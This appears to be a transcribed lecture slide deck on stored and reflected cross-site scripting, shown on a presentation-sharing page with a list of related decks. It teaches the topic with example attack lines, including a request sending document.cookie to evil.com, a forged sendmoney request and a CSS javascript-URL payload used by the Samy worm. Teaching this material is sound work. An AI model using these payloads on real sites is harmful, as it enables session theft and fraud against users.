server side web security cross site scripting
play

Server-side Web Security: Cross-Site Scripting CS 161: Computer - PowerPoint PPT Presentation

Nov 23, 2022 •213 likes •719 views

Server-side Web Security: Cross-Site Scripting CS 161: Computer Security Prof. Raluca Ada Popa February 9, 2016 Top web vulnerabilities OWASP Top 10

  1. Server-side Web Security: Cross-Site Scripting CS 161: Computer Security Prof. Raluca Ada Popa February 9, 2016

  2. – – – – – – – – – – – – Top web vulnerabilities – – – – – – – OWASP Top 10 – 2013 (New) OWASP Top 10 – 2010 (Previous) – – – A1 – Injection – – A1 – Injection – – – – A3 – Broken Authentication and Session Management – A2 – Broken Authentication and Session Management – – – – – A2 – Cross-Site Scripting (XSS) – A3 – Cross-Site Scripting (XSS) – – – – – A4 – Insecure Direct Object References – A4 – Insecure Direct Object References – – – – – – A5 – Security Misconfiguration A6 – Security Misconfiguration – – – – – � � – – – – – – A7 – Insecure Cryptographic Storage – Merged with A9 � � – – A6 – Sensitive Data Exposure – � � – – – – – – A8 – Failure to Restrict URL Access – Broadened into � � – – A7 – Missing Function Level Access Control – – – – – – A8 – Cross-Site Request Forgery (CSRF) A5 – Cross-Site Request Forgery (CSRF) – – – A9 – Using Known Vulnerable Components <buried in A6: Security Misconfiguration> – – – – – – – – – – – – – 2

  3. Cross-site scripting attack (XSS) • Attacker injects a malicious script into the webpage viewed by a victim user – Script runs in user’s browser with access to page’s data • The same-origin policy does not prevent XSS

  4. Setting: Dynamic Web Pages • Rather than static HTML, web pages can be expressed as a program, say written in Javascript : web page <font size=30> Hello, <b> <script> var a = 1; var b = 2; document.write("world: ", a+b, "</b>"); </script> • Outputs: Hello, world: 3

  5. Javascript • Powerful web page programming language • Scripts are embedded in web pages returned by web server • Scripts are executed by browser. Can: – Alter page contents – Track events (mouse clicks, motion, keystrokes) – Issue web requests, read replies • (Note: despite name, has nothing to do with Java!)

  6. Rendering example web server web browser <font size=30> Hello, <b> <script> var a = 1; var b = 2; document.write("world: ", a+b, "</b>"); </script> Browser’s rendering engine: 1. Call HTML parser 3. HTML parser continues: - tokenizes, starts creating DOM tree - creates DOM - notices <script> tag, yields to JS engine 4. Painter displays DOM to user 2. JS engine runs script to change page Hello, world: 3 <font size=30> Hello, <b>world: 3</b>

  7. Confining the Power of Javascript Scripts • Given all that power, browsers need to make sure JS scripts don’t abuse it hackerz.com bank.com • For example, don’t want a script sent from hackerz.com web server to read or modify data from bank.com • … or read keystrokes typed by user while focus is on a bank.com page!

  8. Same Origin Policy Recall: • Browser associates web page elements (text, layout, events) with a given origin • SOP = a script loaded by origin A can access only origin A’s resources (and it cannot access the resources of another origin)

  9. XSS subverts the same origin policy • Attack happens within the same origin • Attacker tricks a server (e.g., bank.com ) to send malicious script ot users • User visits to bank.com Malicious script has origin of bank.com so it is permitted to access the resources on bank.com

  10. Two main types of XSS • Stored XSS: attacker leaves Javascript lying around on benign web service for victim to load • Reflected XSS: attacker gets user to click on specially-crafted URL with script in it, web service reflects it back

  11. Stored (or persistent) XSS • The attacker manages to store a malicious script at the web server, e.g., at bank.com • The server later unwittingly sends script to a victim’s browser • Browser runs script in the same origin as the bank.com server

  12. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com

  13. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious script Server Patsy/Victim bank.com

  14. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim bank.com

  15. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim bank.com

  16. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim bank.com

  17. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  18. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  19. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it E.g., GET http://bank.com/sendmoney?to=DrEvil&amt=100000

  20. Stored XSS (Cross-Site Scripting) Attack Browser/Server And/Or: 6 evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  21. Stored XSS (Cross-Site Scripting) Attack Browser/Server And/Or: 6 evil.com 1 E.g., GET http://evil.com/steal/ document.cookie Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  22. Stored XSS (Cross-Site Scripting) Attack Browser/Server 6 evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script (A “ stored ” embedded in input XSS attack) as though server meant us to run it bank.com

  23. Stored XSS: Summary • Target: user who visits a vulnerable web service • Attacker goal: run a malicious script in user’s browser with same access as provided to server’s regular scripts (subvert SOP = Same Origin Policy ) • Attacker tools: ability to leave content on web server page (e.g., via an ordinary browser); • Key trick: server fails to ensure that content uploaded to page does not contain embedded scripts

  24. Demo: stored XSS

  25. MySpace.com (Samy worm) • Users can post HTML on their pages – MySpace.com ensures HTML contains no <script>, <body>, onclick, <a href=javascript://> – … but can do Javascript within CSS tags: <div style=“background:url(‘javascript:alert(1)’)”> • With careful Javascript hacking, Samy worm infects anyone who visits an infected MySpace page – … and adds Samy as a friend. – Samy had millions of friends within 24 hours. http://namb.la/popular/tech.html

  26. Twitter XSS vulnerability User figured out how to send a tweet that would automatically be retweeted by all followers using vulnerable TweetDeck apps.

  27. Stored XSS using images Suppose pic.jpg on web server contains HTML ! • request for http://site.com/pic.jpg results in: HTTP/1.1 200 OK … Content-Type: image/jpeg <html> fooled ya </html> • IE will render this as HTML (despite Content-Type) • Consider photo sharing sites that support image uploads • What if attacker uploads an “image” that is a script?

  28. Reflected XSS • The attacker gets the victim user to visit a URL for bank.com that embeds a malicious Javascript • The server echoes it back to victim user in its response • Victim’s browser executes the script within the same origin as bank.com

  29. Reflected XSS (Cross-Site Scripting) Victim client

  30. Reflected XSS (Cross-Site Scripting) Attack Server 1 evil.com Victim client

  31. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client

  32. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Exact URL under attacker’s control Victim client Server Patsy/Victim bank.com

  33. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client Server Patsy/Victim bank.com

  34. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

  35. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

  36. Reflected XSS (Cross-Site Scripting) Attack Server And/Or: 1 2 evil.com 7 Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

  37. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com 7 ( “ Reflected ” XSS attack) Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius Ste ff ens German OWASP Day 2018 joint work with Christian Rossow, Martin Johns and Ben Stock Dimensions of Cross-Site Scripting Server Client

413 views • 14 slides
A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web Tangled Itself: Uncovering the History of Client- Side Web (In)Security, USENIX Security 2017 But first..JavaScript security Pages now loaded

482 views • 46 slides
Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security Web security, part 2 Announcements intermission Stephen McCamant Confidentiality and privacy University of Minnesota, Computer Science &amp;

892 views • 6 slides
SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request forgery Code Injection Attacks Attacker executes arbitrary code on server Programming the program Not sanitizing user

287 views • 11 slides
Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web Security, Summer Term 2012 5 Cross Site Scripting 1 Table of Contents Presentation: Inject Javascript in a Page

506 views • 26 slides
Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks Introduction to Computer Security Confidentiality and privacy Day 19: Web security, part 2 Stephen McCamant Even more web risks University of

386 views • 11 slides
Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a

Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a

Session 19 Server Side Scripting Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a server script provides a way to extend an html page to include logic and insertion of data Understand the

612 views • 12 slides
Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer Security Announcements intermission Web security and crypto failure combined Confidentiality and privacy lecture Even more web risks Stephen

435 views • 10 slides
Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected XSS Persistent XSS Damage done by XSS attacks XSS attacks to befriend with others XSS attacks to change other peoples

3.65k views • 37 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

358 views • 22 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

1.12k views • 25 slides
Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is Cross-site Scripting (XSS)? Vulnerability in web application that

760 views • 53 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Server-side Scripting Slides courtesy of Xenia Mountrouidou URLs and web servers 2

Server-side Scripting Slides courtesy of Xenia Mountrouidou URLs and web servers 2

Server-side Scripting Slides courtesy of Xenia Mountrouidou URLs and web servers 2 http://server/path/file Usually when you type a URL in your browser: Your computer looks up the server's IP address using DNS Your browser connects

645 views • 36 slides
Web Security Instructor: Fengwei zhang SUSTech CS 315 Computer Security 1 The Web

Web Security Instructor: Fengwei zhang SUSTech CS 315 Computer Security 1 The Web

Web Security Instructor: Fengwei zhang SUSTech CS 315 Computer Security 1 The Web Security for the World-Wide Web (WWW) New vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), Session Hijacking, and Cross-site

854 views • 57 slides
Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application

Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application

Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application Security course (Elective in Computer Networks) prof. Fabrizio d'Amore Dept. of Computer, Control, and Management Engineering Antonio Ruberti

729 views • 28 slides
Building a Fault-Tolerant ETL Pipeline for Claims CAF Internship Presentation - Summer 2018 Kim

Building a Fault-Tolerant ETL Pipeline for Claims CAF Internship Presentation - Summer 2018 Kim

Building a Fault-Tolerant ETL Pipeline for Claims CAF Internship Presentation - Summer 2018 Kim Hammar Data Analytics Engineer khamq@allstate.com or kimham@kth.se August 30, 2018 Kim Hammar (DAE) Claims CAF August 30, 2018 1 / 24

462 views • 27 slides
Sysco Earnings Results | 3Q18 FORWARD LOOKING STATEMENTS Statements made in this presentation or

Sysco Earnings Results | 3Q18 FORWARD LOOKING STATEMENTS Statements made in this presentation or

Sysco Earnings Results | 3Q18 FORWARD LOOKING STATEMENTS Statements made in this presentation or in our earnings call for the third quarter of fiscal 2018 that look forward in time or that express managements beliefs, expectations or hopes are

863 views • 28 slides
Radiochemical Solar Neutrino Experiments, Successful and Otherwise Richard L. (Dick) Hahn

Radiochemical Solar Neutrino Experiments, Successful and Otherwise Richard L. (Dick) Hahn

Radiochemical Solar Neutrino Experiments, Successful and Otherwise Richard L. (Dick) Hahn Solar-Neutrino &amp; Nuclear-Chemistry Group * Chemistry Department, BNL Upton NY 11973 *Research sponsored by the Offices of Nuclear Physics and

549 views • 35 slides
Social Media &amp; Text Analysis lecture 3 - Language Identification (supervised learning and

Social Media &amp; Text Analysis lecture 3 - Language Identification (supervised learning and

Social Media &amp; Text Analysis lecture 3 - Language Identification (supervised learning and Naive Bayes algorithm) CSE 5539-0010 Ohio State University Instructor: Alan Ritter Website: socialmedia-class.org In-class Presentation a

964 views • 62 slides
WEB CLIENT SECURITY Riccardo Bonafede Daniele Lain spritzers - CTF team Leonardo Nodari

WEB CLIENT SECURITY Riccardo Bonafede Daniele Lain spritzers - CTF team Leonardo Nodari

WEB CLIENT SECURITY Riccardo Bonafede Daniele Lain spritzers - CTF team Leonardo Nodari spritz.math.unipd.it/spritzers.html Disclaimer All information presented here has the only purpose to teach how vulnerabilities work. Use them to win

482 views • 30 slides
Browser Security Part 1 Background Web Server Browser Serves content Represents content

Browser Security Part 1 Background Web Server Browser Serves content Represents content

Browser Security Part 1 Background Web Server Browser Serves content Represents content Static Static (HTML) Dynamic Dynamic (XML, ASP, JSP) Server-side scripts Client-side scripts (JScript) Fetch content from

621 views • 24 slides
Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji Prateek Saxena Dawn Song Illinois Institute UC Berkeley UC Berkeley Of Technology 1 A Cross-Site Scripting Attack Hi Joe, &lt;img src=&gt;

569 views • 42 slides
Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting Executing unauthorized code XSRF - Cross-site request forgery Remote execution for logged-in users SQL Injection A malicious variable placed into a

681 views • 18 slides

More recommend